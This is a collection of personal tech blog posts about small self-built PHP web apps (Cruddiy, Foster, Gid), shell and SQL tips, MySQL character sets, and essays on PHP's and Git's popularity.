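    # placeholder URL: fetch the Cruddiy zip from wherever you keep it
    wget https://example.com/cruddiy.zip
    unzip cruddiy.zip -d /var/www/html/cruddiy

    # the webserver user (www-data here) needs write access for the generated /app folder
    chown -R www-data:www-data /var/www/html/cruddiy

    # now surf to http://yourserver/cruddiy in your browser and follow the instructions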

    Cruddiy does not follow the MVC paradigm!

    Yes, look elsewhere if you need this. This is not a framework. This is a form generator.

    Your code is full of dirty hacks

    Sure, the generator does quite a bit of array mangling and dirty string replacement (hence the name), but the PHP pages Cruddiy generates are as clean as they come. And when you’re done generating pages, you can just delete Cruddiy. It completely builds a self-contained portable app that will run on almost any webserver with PHP (i.e. most).

    Your generated code is incomplete

    At the moment what’s lacking is error and value checking on database inserts/updates (all fields are required and it doesn’t check field types: integers vs dates etc.). These will throw generic errors or do nothing at all. I will probably improve this, but for most use-cases (see above) this should not be a problem. The generated code does use prepared statements and should not be vulnerable to SQLi. But hey, please drop me a line if you find something!

    Next features?

    I might add these things:

    • Darkmode
    • Bootstrap 4 theme ✔️ Fixed per 20200803
    • Export to CSV or XLS (users probably want this more often than not)
    • Rearrange column order
    • Search records (at the top of the page) ✔️ Fixed per 20200722
    • User registration (simple table with username and password: .htaccess works for now)
    • Define table relations (use for cascading deletes etc.) ✔️ Fixed per 20201126
    • More specific field types (ENUM = drop-down list, BOOLEAN = checkbox, etc.)
    • More and better input validation
    • Catch more database errors
    Cruddiy in action.

  • Use find (1) as a quick and dirty duplicate file finder

    Run the following two commands in bash to get a listing of all duplicate files (from a directory or location). This can help you clean out duplicate files that sometimes accumulate over time.

    The first command uses find to print all files (and specific attributes) from a specific location to a file, prefixing the size of the file to the name. This way all files with the same filename and same size can be grouped together, which is usually a strong indicator that the files are identical.

    When you run the second command you will get a sorted list of all actual duplicates, grouped together. This way, you can quickly pick out similar files and manually choose which ones to keep or delete.

    find . -type f -printf "%s-%f\t %f %c\t %p\n" >> /tmp/findcmd
    
    for i in $(sort -n /tmp/findcmd | awk '{print $1}' | uniq -cd | sort -n | awk '{print $2}'); do grep "$i" /tmp/findcmd; done

    The output will look something like this; you can instantly tell which files are duplicates, based on size, name and/or timestamp.

    1067761-P4270521.JPG     P4270521.JPG Wed Apr 27 18:05:04.0000000000 2011        ./Backups Laptops/Ri-janne/2011 Diversen
    1067761-P4270521.JPG     P4270521.JPG Wed Apr 27 18:05:04.0000000000 2011        ./Backups Laptops/Ri-janne/2011 camera
    1067898-IMG_3418.JPG     IMG_3418.JPG Thu Aug 28 20:08:28.0000000000 2008        ./Piks/2008/Vakantie USA 2008/Dag 7 Louisville Shopping
    1067898-IMG_3418.JPG     IMG_3418.JPG Thu Aug 28 19:08:28.0000000000 2008        ./Backups Laptops/Ri-janne/2008 USA
    1067969-P9180184.JPG     P9180184.JPG Sat Sep 18 17:45:52.0000000000 2010        ./Backups Laptops/Ri-janne/2010 Diversen
    1067969-P9180184.JPG     P9180184.JPG Sat Sep 18 17:45:52.0000000000 2010        ./Backups Laptops/Ri-janne/2010 uitzoeken
    1068244-100_2962.jpg     100_2962.jpg Thu Jul 17 18:18:52.0000000000 2008        ./.Trash-1000/files/Mijn afbeeldingen/Italia 09/Greece '08
    1068244-100_2962.jpg     100_2962.jpg Thu Jul 17 18:18:52.0000000000 2008        ./Backups Laptops/Jan/Mijn documenten/Mathea/Mijn afbeeldingen/Italia 09/Greece '08
    1068284-DSC_7640.JPG     DSC_7640.JPG Sat Apr 26 14:47:58.0000000000 2014        ./Piks/2014/20140426 KDag
    1068284-DSC_7640.JPG     DSC_7640.JPG Tue Apr 29 21:56:54.0000000000 2014        ./Piks/2014/20140426 Koningsdag
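
    Same name and size is a strong hint, but not proof. If you want to be certain before deleting anything, compare checksums of the candidates; identical sums mean the contents really are the same:

    md5sum "./Piks/2014/20140426 KDag/DSC_7640.JPG" \
           "./Piks/2014/20140426 Koningsdag/DSC_7640.JPG"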
    
  • Foster: how to build your own bookshelf management web application


    foster
    /ˈfɒstə/

    verb

    1. Encourage the development of (something, especially something desirable). “the teacher’s task is to foster learning”

    TLDR: I made a personal bookshelf management web application and named it Foster and you can find it here. Here’s what I did — with gifs — so you might build your own.

    Name

    I named it Foster. Because of *this* blog post — it accompanies the application, so it’s self-referential. And also, because I am currently reading David Foster Wallace‘s magnum opus Infinite Jest. And lastly, the word ‘foster’ makes a lot of sense otherwise, just read on 😉

    Background

    I like to read and I like to buy physical books — and keep them. Over the years I tracked both of these things in a spreadsheet. But this became unmanageable so I needed something else.

    Something like Goodreads but self-hosted. So, preferably a web application where I could:

    • track my reading progress
    • keep track of my bookshelf

    But I couldn’t find anything that fit, so I knew I probably had to roll my own. In simpler times MS Access could do this sort of thing in a heartbeat. But it’s 2019 and I wanted a web application. However I am not a web developer and certainly not a frontend developer.

    But when I came across https://books.hansdezwart.nl/ I knew this was what I was looking for! So I emailed Hans. He was very kind in explaining his application was self-coded and not open-source, but he did provide some pointers. Thanks Hans! So with those tips I built my own application (front and back) from scratch. And I decided to pass the knowledge on, with this blog.

    The Foster frontend (I am still adding books)

    This is what the Foster frontend looks like. It’s pretty self-explanatory: I can search *my* books, track and see reading progress, track collections, click through to book details and see the activity feed (more on that later). Oh, and it’s fast! ♥

    Frontend

    The five different parts in the frontend are: ‘Search’, ‘Statistics’, ‘Currently reading’, ‘Collections’ and ‘Activity feed’. They are presented as Bootstrap cards. The frontend is just one index.php file with a layout of the cards. All cards (except ‘Search’) are dynamically filled: each card is a div with its own class, and the content for that class is generated by one JavaScript function per card, which in turn calls a PHP file. And the PHP files just echo raw HTML.

    Besides the index.php file, there is one search.php file that makes up the rest of the frontend. This file takes care of presenting the book details, search output, log and lists views (more on that later). So, most of what can be done and seen in the frontend is handled by the search.php file.

    The frontend itself is of course nothing unique. It’s just a representation of the data. The backend is a bit more interesting!

    Database

    The frontend was the easy part. At least it was after I figured out the backend! I spent quite a bit of time thinking about the database design and what the backend would have to do. I thought the design for such a small application wouldn’t be too difficult. But I surprised myself with the number of changes I made to the design, to get it just right. And I wanted to get it right because:

    General rule of thumb: when you start with a good design, everything else that comes after will be a lot easier.

    Self-explanatory view of the database design

    The multiple foreign-key relations between tables (on ids etc.) are not defined in the database. I chose to do this in the code and the JOIN queries.

    It’s not hard to understand the database design. And yes, the design could be a little tighter — two or three tables — but let me explain!

    Log, actions and states

    One of the main things I spent time thinking about was the actions and their respective states.

    I figured you can do one of five things with a book (actions):

    • You want a book
    • You get/buy/own the book
    • You start reading it
    • You finish reading it
    • You purge/remove/sell/give away the book

    Makes sense right? You could even call it the ‘book life cycle process’. With one input and one output.

    HOWEVER! Some books you already own without wanting them first. Or, you can read the same book more than once. Or, you can give a book to a friend, and buy it again for yourself. Or, you can finish reading a book that you borrowed — from a friend or the library — so it is not on your shelf anymore. All of these things happen. So actually the ‘life cycle’ actions are not a chronological, fixed, start-to-end tollgate process; it’s continuous and messy.

    Book log

    Every new action is added to the book log. In the frontend the last 25 entries to the book log are presented as the Activity feed. Every action has a timestamp for when the action got logged and a date for the action itself, which are two different things. So when I now add a book to my shelf that I acquired 4 years ago, the book log timestamp is now, but the date for the action is 4 years ago.

    The Activity feed

    With this log I can keep track of books even after I got rid of them (because selling/purging is just one of the actions for a book). This is important because this way I don’t lose the log history of a book.

    Also I can add books to my wanted list even if I have owned them before (maybe I gave them away etc.). And I can start/finish reading the same book more than once. It doesn’t matter, because it is just a log entry.

    Now here’s the interesting thing. With all this log information I can generate four states:

    • Books I want
    • Books I own
    • Books I have read
    • Books I had

    These states are generated by specific hardcoded queries, one per state. They are generated on the fly from what is in the log table, where the most recent log record prevails in deciding the current status (see the sketch below).
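
    To give an idea, a hypothetical ‘Books I own’ query could look something like this: pick the most recent log entry per book and keep the books whose last action is ‘own’. The table and column names here are made up, the real schema differs.

    # hypothetical schema: book(id, title), log(book_id, action, action_date)
    mysql -u foster -p foster -e "
        SELECT b.title
        FROM book b
        JOIN log l ON l.book_id = b.id
        JOIN (SELECT book_id, MAX(action_date) AS last_date
              FROM log GROUP BY book_id) latest
          ON latest.book_id = l.book_id AND latest.last_date = l.action_date
        WHERE l.action = 'own';"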

    And with all this:

    Foster will track the complete history per book and at all times represent all books I want, own, have read or have owned, at that specific moment in time.

    Lists

    I could have defined these actions as a list: but lists are simpler. Let me explain.

    I tend to collect and read specific genres of books, e.g. music, management and computer history books. So I tend to organize books like that. These descriptions/genres are all, of course, just lists.

    Some books can be three of these things at the same time: part biography, part computer history, part management. So one book can be a member of more than one list.

    In the Foster backend I can add or delete books to and from as many lists as I like.

    Easily adding/deleting books from a list with the same dropdown menu (click for a gif)

    I can also easily create new lists. Say: a list of books that I want for my birthday, or books that are on loan, or books that are signed by the author etc. I just add one new list to my table, and the list will be instantly available in the backend and presented in the frontend.

    Collections

    In the frontend the action log states and the different lists are grouped together under the Collections card. As stated the first 4 collections are populated from the log, and a book always has a last state. The others are just lists.

    I can create or delete as many lists as I’d like, and it won’t affect the book log. This way I can organize my book collection far better than I could physically (a book can only have one spot on your physical shelf).

    Adding books with the Bol.com API

    This is where the magic happens! Bol.com — a large Dutch book retailer — has a very easy API you can use to query their book database. I use it to search and add books to my collection. With one click I can get most book details: title, ISBN (=EAN), image, description etc. And I can pull them all into my own database. Including the image, which I then copy and store locally. Like this:

    Adding a book via bol.com API (click for a gif)

    Of course I can also edit book details when necessary, or just enter a book by hand without the API. Sometimes Bol.com does not carry a book.

    Backend

    The bol.com search API is the start page of my backend. The other important backend page is an overview of all my books. Clicking on the titles brings up an edit view of a book. But most importantly I can quickly add or delete books from lists here AND add actions (started reading, finished).

    I have defined jQuery actions on the <select option> dropdown menus, which provide a popup — where I can fill in a date if necessary — and which trigger database inserts (there definitely might be some security concerns here: but the backend is not public).

    Security

    The frontend is open for everyone to see. I don’t mind sharing (my podcast list is also public), also because I always enjoy reading other people’s lists or recommendations. The backend is just one .htaccess password protected directory (a minimal example below). In my first database design I had a user table with accounts/passwords etc. But the .htaccess file seemed like the easiest/quickest solution for now.
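
    For completeness, that protection amounts to something like this. The paths and username are examples, and the Apache vhost needs AllowOverride AuthConfig for the .htaccess file to be picked up.

    # create the password file once, outside the webroot
    htpasswd -c /etc/apache2/.htpasswd jan

    # write a minimal .htaccess into the backend directory
    printf '%s\n' \
        'AuthType Basic' \
        'AuthName "Foster backend"' \
        'AuthUserFile /etc/apache2/.htpasswd' \
        'Require valid-user' > /var/www/foster/backend/.htaccess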

    Tech

    I built Foster from scratch, no Symfony/Laravel or what have you. And I am a bit annoyed and surprised there is still no MS Access RAD equivalent for the web in 2019 (i.e. an all-in-one tool: from DB design to logic to GUI design to runtime).

    I know Django does most of the backend for you, so I briefly looked at it. But for Foster I still ended up using PHP / MariaDB / Bootstrap 4 / JavaScript / jQuery. It’s a familiar and very portable stack that you can mostly just drop and run anywhere (and most answers are on StackOverflow 🤓).

    I’ve thought about using SQLite, but I am very familiar with MySQL/MariaDB so that made more sense. Also I learned more about Bootstrap than I actually cared about, but that’s alright. And I wrote my first serious piece of JavaScript code ever (for the dropdown select actions). So that was fun.

    All in all: I spent a few days pondering the database design in the back of my mind. And 4 evenings programming front and backend. And now I am just polishing little things: which is a lot of fun!

    Further development

    Right now, I still have around 200 more books from my library to catalogue correctly — that’s why some dates are set to 0000-00-00. But here are a few possible new features I am thinking about:

    • RSS feed for the activity log? Now that I am bulk adding books the activity feed is not so relevant, but when things settle down, who knows, people might be interested. After I wrote a draft of this blog I implemented it!
    • Twitter integration? Posting the log to a dedicated Twitter feed.
    • Adding books by scanning the barcode / ISBN with your phone camera? If I can just get the ISBN I can automate bol.com API to do the rest. Might speed things up a bit (and might be useful when you run a secondhand bookstore 😉). I created an iOS shortcut that does exactly this! It scans the book barcode/ISBN/EAN and opens the Foster edit.php URL with this ISBN number and from there I can add the book by clicking ‘Add’ (all book details are available and prefilled by the Bol.com API). It’s great!
    • Storing/tracking more than books? CDs, DVDs, podcasts I listened to, movies I watched etc.
    • Multi-user? In the first database design there were multiple users that could access / add the books that were already in the database but still create their own log and lists. I think I could still add this to the current design.
    • As you can see in the database design, there is a remarks table. I haven’t used this table. A remark is a ‘blog’ (or a short self-written review) of a book, that can be presented with the book details. This is a one-to-many relationship, because you might want to make new remarks each time you reread a book. But, I currently blog about every book I read, so the remarks might be just an embedded blog link?

    Just share the source already!

    “Foster looks nice. Please share the code!” No, sorry, for several reasons.

    1. I made Foster specifically for me. So chances that it will fit your needs are slim and you would probably still need to make changes. In this post I share my reasoning, but you should definitely try to build your own thing!
    2. When Foster was almost done, I learned about prepared statements (did I mention I am not a web developer?)… so I had to redo the frontend. But I haven’t redone the backend (yet): so it’s not safe from SQL injection, and it contains other pretty bad coding practices. Open sourcing it can of course generate code improvements, but it would first make my site vulnerable.
    3. But most importantly: Building a web application to scratch your own personal itch and learning new things can be one of the most fun and rewarding experiences you will have! And I hope this blog is useful to you, in achieving that goal.

  • PHP: how did it become so popular?

    PHP powers a gigantic part of the internet. So it is, by definition, a very popular (i.e. prevalent) language. But it is also very popular (i.e. well-liked) to dislike PHP as a — serious — language.

    This could be explained as one of the side effects of that same popularity. With great exposure, comes greater scrutiny. But that would be too easy.

    Picture of probably one of the most pragmatic people on the internet ❤

    Because when discussing PHP as a serious computer programming language there are serious arguments about what exactly PHP lacks as a language. And of course a lot of these things are fuel for endless, and useless, debate. Also because even the author of PHP, Rasmus Lerdorf, would probably agree with most of them!

    It seems like a popular pastime to debate everything that is bad about PHP. So over the years there have been several (viral) blogposts about this: here, here, here and here (which spawned this great response).

    Even with all the changes made to PHP in recent years, this is still a common sentiment regarding PHP. This is also illustrated by a recent remark from highly respected programmer Drew DeVault:

    So PHP certainly has its fair share of critique (it is no Lisp!).

    So why is it so popular?

    I certainly have NO need to add my two cents to this debate. But I am VERY interested to investigate why and how PHP — a widely criticised language — became so incredibly popular.

    But you don’t have to read this post, because Rasmus Lerdorf explains it rather well in the first part of this next video. (There is also another video of the same talk at a different location, but the slides are easier to follow in this one.)

    https://www.youtube.com/watch?v=wCZ5TJCBWMg&t=2s

    I thought the talk was very interesting and he drops some killer quotes, so I highly recommend it! For easy reference, here follow the key slides and quotes from his presentation that, in my opinion, help answer the question how PHP became so popular. Of course this may be a biased view (he is the creator) but I am open to different views.

    C API for the web

    My grand scheme was to write a C API for the web. So to abstract away all the web specific things that you needed to know to get your business logic up online.

    Rasmus Lerdorf

    This was the plan.

    Straight away Rasmus explains he never intended to design a “full-blown” real programming language, but more a templating system. And he wasn’t happy with CGI.pm (“simply writing HTML in another language”). He wanted a C API for the web, where he abstracted away all boiler plate stuff he always needed to write when making a web application. The idea being that the business logic would be written in a real language (C or C++). And PHP was the templating language to present the data. However “the web moved too fast and there weren’t enough C developers in the world”. And with this, his programming language (by request) grew.

    What is most striking about this remark, is his dedication towards the end goal: get your business logic online! This initial, pragmatic approach is something that returns time and time again in the development of PHP. With PHP being a means to an end. Just another tool. Nothing to be religious about.

    6 months

    Rasmus also explains, more than once, that even though he added features he was never under the impression that this little language would survive. In the first few years he was thoroughly convinced it would only last about six more months before something better would come along. And that something would solve the very real problems his language could already solve.

    Therefore he also states that for the first 5 to 7 years PHP was “NOT a language, it was a templating system”. But apparently that something better never came along, and reluctantly his templating system grew into a programming language (with recursion and all that).

    LAMP wasn’t an accident

    However, for someone who was convinced his templating system would die off within six months, he was exceptionally good at making the right decisions to further the adoption of PHP.

    The right calls!

    mod_php is probably the most important decision of all of these. It made certain that PHP would tie in nicely with Linux, Apache and MySQL and thus create one of the most powerful (free) software stacks ever. Rasmus is very clear on why he thought it was necessary to become an integral part of this ecosystem. Say what you will, but he definitely made the right call here.

    mod_perl was too late to the game. And too complex and expensive (you needed a dedicated box in a time when VMs were not a thing) when it did arrive. Python (the other P) had a different focus and things like Django were many years in the future. But there are more choices Rasmus made that worked, and that the early web clearly needed:

    More right calls.

    Speed and efficiency

    PHP is amazingly good at running crap code.

    Rasmus Lerdorf

    Anybody with a good idea, could put their idea online and this has made the web a much much better place.

    Rasmus Lerdorf

    PHP is probably the most pragmatic language ever. A kind of pragmatism that lowers the barrier to entry. Which creates one of the main points of criticism: it makes for bad programmers. Programmers that don’t really know what they’re doing, because PHP does all the work for them. You can discuss this all you want, but one thing is clear: Rasmus knows who uses his language and makes certain to lower as many barriers as he can.

    Critique

    Rasmus is of course a very intelligent guy, he knows all this. He also explains some of the reasons behind the strange language design decisions he made. Some have a good explanation, for others he fully admits he made the wrong decision. Admirably, his ego is also subjected to pragmatism.

    Some decisions are up for debate.

    Pragmatic Hypertext Preprocessor

    PHP is a tool. PHP is not important, what you do with it is important.

    Rasmus Lerdorf

    Arguing about the color of the hammer used to build that thing is just moronic. We can’t lose track of what we’re doing here, why we’re programming. We’re programming to solve a problem and hopefully it’s a problem that actually matters.

    Rasmus Lerdorf

    PHP is not going away. Why? Because some of the things that PHP solves are not yet solved by any other language (don’t @ me). I am a comp-sci graduate, and even though I program very little, I have probably written more code in PHP than in any other language. I am not building big important business applications, most of the time I just want something online (from a database) and I want it fast! And PHP is my hammer. Time and time again I try to look at other things. And I get it. There is serious critique. But if you want to change that, you can! Nobody is stopping you. So stop complaining and get to it. Even though I don’t share the otherwise harsh tone of this post, I do share that building something compelling is up for grabs!

    And when someone finally does that, then maybe Rasmus — after 25 years — will finally get his wish. It just took a little bit longer than six months.

  • Popular post postmortem

    Yesterday I wrote a story about how Git is eating the world. And in less than 24 hours more than 10.000 people visited this article! This is not the normal kind of traffic for this site. So that calls for its own article.

    As you can see, there is a slight uptick the last day.

    Not only did the above WordPress plugin tell me I hit 10.000, but my server logs said the same.

    grep git-is-eating-the-world j11g-access.log|awk '{print $1}'|sort -u|wc -l

    I run this WordPress installation on my own VPS. Which, by the way, could handle the load just fine! (PHP 7.3 is great.)

    1 core/2GB VPS with Apache + PHP 7.3

    How?

    I usually write about things that interest me: but those things may not always be of interest to the general public. But in this case I made a conscious effort to write about something topical and a little bit controversial (BitBucket dropping Mercurial support). I also picked a catchy title: a play on Marc Andreessen’s famous quote. And I deliberately tried to push the article. I.e. this is how most content creators do it. But I usually put stuff out there, and see where it lands. I mainly enjoy writing for the sake of writing. My most visited article was a Django tutorial which generated 3000 visits this year (all from generic Google searches). So I thought I could try to give promotion a little bit more effort. This idea came after reading about a Dutch blogger who was a bit obsessed with getting clicks. Which to me is (still) not the best reason to write, but of course I can see why he was obsessed with it. When you write something, it’s more fun when people actually read it!

    Submitting it

    So after writing I picked lobste.rs and Hacker News to submit my story to. I submit links very frequently to both sites, just not my own content. But this content seemed right for these sites.

    On Hacker News it sadly went nowhere. This sometimes happens. Timing is everything. I have often also submitted something there that went nowhere, but that same link would be on the front page the next day via a new submission from someone else. My submission did however generate 234 unique visits. Which normally would be a good day for my site.

    Six upvotes. Not enough for the front page.

    Lobste.rs however, is a different story. Since submitting it there, it quickly shot up to the number one position. And at the time of writing it was still number one. Also, lobste.rs had the most relevant discussion and comments of all aggregators.

    I ❤ the lobste.rs community🦞

    Uh?!

    After this I also tried submitting my link to Reddit. But much to my surprise someone beat me to it!? He (or she) submitted my post to two subreddits. I don’t know how the submitter found my post. But anyway, in r/programming it received exactly zero upvotes but it did generate 5 comments? But in r/coding it was the number one post for almost the entire day!

    This specific subreddit has 168,000 readers and around 1000 active users at any given moment. So even though it only received 83 upvotes, this did generate the bulk of my traffic.

    Timing is everything

    After this, things got shared (organically?) on Twitter, and other tech sites (like Codeproject) also picked it up. People also seemed to share the link by e-mail: 175 unique clicks came from Gmail and 32 from Yahoo! Mail. Which I think is quite a lot!

    I also cross post every WordPress article to Medium: these readers don’t come to my site, but they are of course able to read my content. However, the reach there was very low.

    Lessons?

    Stating the very obvious here, but it helps to pick a topical subject and then try to push it on news aggregators. Also (obvious) it struck me how difficult it was to get a foot in the door — those first few upvotes. After that it gets easier, because you become more visible.

    These are all obvious. But the most fun was actually discovering that the thing that you wrote took on a life of its own. And people you don’t know are sharing, reading and discussing it without your interference. I just love that. I still think that that is part of the magical aspect of the internet. People I have never met who live on the other side of the planet can instantly read and discuss what I’ve written. The internet gives everyone a voice and I love it.

  • Git is eating the world

    The inception of Git (2005) is more or less the halfway point between the inception of Linux (1991) and today (2019). A lot has happened since. One thing is clear however: software is eating the world and Git is the fork with which it is being eaten. (Yes, pun intended).

    Linux and Git

    In 2005, as far as Linus Torvalds’ legacy was concerned, he didn’t need to worry. His pet project Linux — “won’t be big and professional” — was well on its way to dominating the server and supercomputer market. And with the arrival of Linux powered Android smartphones this usage would even be eclipsed a few years later. Linux was also already a full-blown day job for many developers and the biggest distributed software project in the world.

    However, with the creation of Git in 2005, Linus Torvalds can stake the claim that he is responsible for not one, but two of the most important software revolutions ever. Both projects grew out of a personal itch, with the latter born out of the needs of the former. The story of both inceptions is of course very well documented in the annals of internet history i.e. mailinglist archives. (Side note: one of Git’s most impressive feats was at the very early beginning, when Torvalds was able to get Git self-hosted within a matter of days 🤯).

    Today

    Fast forward to today and Git is everywhere. It has become the de facto distributed versioning control system (DVCS). However, it was of course not the first DVCS and may not even be the best i.e. most suitable for some use cases.

    The Linux project using Git is of course the biggest confirmation of Git’s powerful qualities. Because no other open source project is bigger than Linux. So if it’s good enough for Linux it sure should be good enough for all other projects. Right?

    However Git is also notorious for being the perfect tool to shoot yourself in the foot with. It demands a different way of thinking. And things can quickly go wrong if you’re not completely comfortable with what you’re doing.

    Web-based DVCS

    Part of these problems were solved by GitHub. Which gave the ideas of Git and distributed software collaboration a web interface and made it social (follow developers, star projects etc.). It was the right timing and in an increasingly interconnected world distributed version control seemed like the only way to go. This left classic client-server version control systems like CVS and SVN in the dust (though some large projects are still developed using these models e.g. OpenBSD uses CVS).

    GitHub helped popularize Git itself. And legions of young developers grew up using GitHub and therefore Git. And yet, the world was still hungry for more. This was proven by the arrival of GitLab: initially envisioned as a SaaS Git service, GitLab now earns most of its revenue from self-hosted installations with premium features.

    But of course GitHub wasn’t the only web-based version control system. BitBucket started around the same time and offered not only Git support but also Mercurial support. And even in 2019 new web-based software development platforms (using Git) are born: i.e. sourcehut.

    Too late?

    However the fast adoption of tools like GitHub had already left other distributed version control systems behind in popularity: systems like Fossil, Bazaar and Mercurial and many others. Even though some of these systems on a certain level might be better suited for most projects. The relative simplicity of Fossil does a lot of things right. And a lot of people seem to agree Mercurial is the more intuitive DVCS.

    BitKeeper was also too late to realize that they had lost the war, when they open-sourced their software in 2016. Remember: BitKeeper being proprietary was one of the main reasons Git was born initially.

    Yesterday BitBucket announced they would sunset their Mercurial support. Effectively dealing nothing short of a deathblow to Mercurial, as BitBucket was one of the largest promoters of Mercurial. This set off quite a few discussions around the internet. Partly because of how they plan to sunset their support. But partly also because Mercurial seems to have a lot of sentimental support — the argument being that it is the saner and more intuitive DVCS. Which is surprising because, as stated by BitBucket, over 90% of their users use Git. So there is a clear winner. Still, the idea of a winner-takes-all does not sit well with some developers. Which is probably a good thing.

    Future?

    Right now Git is the clear winner, there is no denying that. Git is everywhere, and for many IDEs/workflow/collaboration software it is the default choice for a DVCS. But things are never static, especially in the world of software. So I am curious to see where we’ll be in another 14 years!

  • Gid – Get it done!

    Last weekend I built a personal ToDo app. Partly as an excuse to mess around a bit with all this ‘new and hip’ Web 2.0 technology (jQuery and Bootstrap) 🙈

    But mostly because I needed one, and I couldn’t find a decent one.

    Yes, I designed the icon myself. Can you tell?

    Decent?

    Decent in my opinion would be:

    1. Self hosted
    2. Self contained
    3. Use a plain text file
    4. Mobile friendly
    5. Able to track / see DONE items

    And Gid does just that (and nothing more).

    1. Any PHP enabled webserver will do.
    2. No need for third party tools, everything you need is right here (Bootstrap and jQuery are included).
    3. No database setup or connection is necessary. Gid writes to plain text files that can be moved and edited by hand if needed (like todotxt.org).
    4. Works and looks decent on a smartphone.
    5. The DONE items are still visible with a strike through.

    I had fun, learned quite a few new things (web development is not my day job) and me and my wife now share our grocery list with this app!

    The biggest headache was getting iOS to consistently and correctly handle input form submit events. Being a touch device, this is somehow still a thing in 2019. Thanks Stack Overflow! Anyway, this is what it looks like on my iPhone.

    Web development

    This was mainly an interesting exercise to try to understand how PHP, Javascript/jQuery and Bootstrap work together on a rather basic level and how with Ajax you are able to manipulate the DOM. I deliberately used an older tech stack, thinking a lot of problems would be solved; however (as explained) some things still seem to be a thing. Also, what I was trying to do is just very, very basic and still I feel somehow this should be way easier! There are a lot of different technologies involved that each have their own specifics and that all have to work together.

    Code is on Github: do as you please.

    (P.S. Yes, the name. I know.)

  • Create a Chrome bookmark html file to import list of URLs

    I recently switched RSS providers and I could only extract my saved posts as a list of URLs. So I thought I’d add these to a bookmark folder in Chrome. However, Chrome bookmark import only accepts a specifically formatted .html file.

    So if you have a file with all your URLs, name this file ‘urls.txt’ and run this script to create a .html file that you can import in Chrome (hat-tip to GeoffreyPlitt).

    #!/bin/bash
    #
    # Run this script on a file named urls.txt with all your URLs and pipe the output to an HTML file.
    # Example: ./convert_url_file.sh > bookmarks.html
    
    echo "<!DOCTYPE NETSCAPE-Bookmark-file-1>"
    echo '<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">'
    echo '<TITLE>Bookmarks</TITLE>'
    echo '<H1>Bookmarks</H1>'
    echo '<DL><p>'
      cat urls.txt |
      while read L; do
        echo -n '    <DT><A HREF="';
            echo ''"$L"'">'"$L"'</A>';
      done
    echo "</DL><p>"

  • About WordPress, emojis, MySQL and latin1, utf8 and utf8mb4 character sets

    PSA: the MySQL utf8 character set is not real Unicode utf8. Instead use utf8mb4.

    So you landed here because some parts of your website are garbled. And this happened after a server or website migration. You exported your database and imported this export or dump on the new server. And now your posts look like this:

    Strange characters!

    When they should look like this:

    Emojis!

    These are screenshots from this website. This website was an old WordPress installation that still used the latin1 character set. The WordPress installation was up to date, but automatic WordPress updates will never update or change the database character set. So this will always remain what it was on initial installation (which was latin1 in my case).

    And latin1 can not store (real) Unicode characters e.g. emojis. You need a Unicode character set. So, just use utf8, right?

    Problem 1: exporting and importing the database with the wrong character set

    When exporting/dumping a database with mysqldump, it will use the MySQL server’s default character set (set in my.cnf). In my case this was set to utf8. But by not explicitly telling mysqldump to use the correct character set for this particular database (which was latin1), my dumped data was messed up.

    So when I restored the dump (on the new server) some text was garbled and emojis had completely disappeared from blog posts.

    I fixed this with help of these links. Key here is: explicitly set the correct character set for a database when exporting this database. Then: change all instances in the dump file from the old character set to the new character set and import this file (see the commands below).

    https://theblogpress.com/blog/seeing-weird-characters-on-blog-how-to-fix-wordpress-character-encoding-latin1-to-utf8/
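
    In command form the procedure boils down to something like this. The database name and character sets are examples, use whatever your old installation actually ran, and note that the sed is crude: eyeball the dump before importing.

    # dump with the character set the database actually uses (latin1 here)
    mysqldump --default-character-set=latin1 --skip-set-charset wordpress > dump.sql

    # point the dump at the new character set
    sed -i 's/latin1/utf8mb4/g' dump.sql

    # import with the new character set
    mysql --default-character-set=utf8mb4 wordpress < dump.sql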

    Problem 2: some emojis work, some don’t

    After this my text was fine. I exported using the old character set and imported using utf8, so what could go wrong? But some emojis were still missing, while others were fine?! This was a head-scratcher.

    There is a question mark instead of an emoji

    How can this be? I had set my database character set to utf8 (with utf8_general_ci collation). This is Unicode, right? Wrong!

    MySQL utf8 does not support complete Unicode. MySQL utf8 uses only 3 bytes per character.

    Full Unicode support needs 4 bytes per character. So your MySQL installation needs to use the utf8mb4 character set (and utf8mb4_unicode_ci collation) to have real and full Unicode support.
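
    Converting an existing installation means changing both the database default and every existing table. A minimal sketch, assuming a database called wordpress (back up first):

    mysql -e "ALTER DATABASE wordpress CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;"
    mysql -e "ALTER TABLE wordpress.wp_posts CONVERT TO CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;"

    Repeat the ALTER TABLE for the other WordPress tables (wp_options, wp_comments etc.) and set DB_CHARSET to utf8mb4 in wp-config.php, otherwise WordPress will keep talking to the database with the old character set.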

    Some strange decisions were made back in 2002. 🤯 Which has given a lot of people headaches.

    So, MySQL utf8 only uses three bytes per character, but the explanation for the image with the one missing emoji is that *some* emojis (like the ❤️) can be expressed correctly with only three bytes.

    Problem 3: but I used emojis before, in my latin1 WordPress installation?!

    Yes, things worked fine, right? And here is the thing: if you dumped your database with the correct (old) character set and imported correctly with this old character set, things would still work!

    But you said latin1 does not support (4 byte character) emojis!?

    Correct!

    However WordPress is smart enough to figure this out: when you use emojis in post titles or posts it will check the database character set and change the emoji to (hexadecimal) HTML code (e.g. 😀 is stored as the entity &#x1f600;) — which can be expressed and stored just fine in latin1.

    But how do you explain this image? This was after incorrectly dumping and importing a database.

    Wait, what?! The URL has the correct emoji but the post title does not!?!

    The post URL has two emojis, but one emoji is missing from the title?! I already explained why the emoji is missing from the post title, so how can that emoji be present in the post URL? This is because WordPress stores the post titles differently from the URLs.

    How the title and the post name (url) are stored

    So the post title field stores real Unicode symbols and the post_name (URL) field stores them encoded. So there you have it 🤓!

  • Use PostgreSQL REPLACE() to replace dots with commas (dollar to euro)

    If you have set up your database tables correctly you might be using double-precision floating-point numbers to store currency values. This works great because dollars use dots to represent decimals.

    The problem starts when it’s not actually dollars you are storing but euros, and maybe you need to copy query output to Excel or LibreOffice Calc to work with these Euro values.

    Both of these spreadsheet programs don’t know how to correctly handle the dots or how to correctly import them — at least without some tricks. There are different ways to deal with this, but this is all after you copied the data over to your spreadsheet. Find and replace is a common one.

    But I like to start at the source. (Yes, you can change your system locale and all that, but I would advise against that for other reasons).

    So assuming this is a query you would like to run regularly, instead of running this (which will give you the dotted price):

    SELECT product, 
    price as price_with_dot
    FROM products

    You can use REPLACE() to replace the dot with a comma, after rounding and casting the double-precision float to text.

    SELECT product, 
    REPLACE(ROUND(price::numeric, 2)::text, '.', ',') as "price_with_comma"
    FROM products

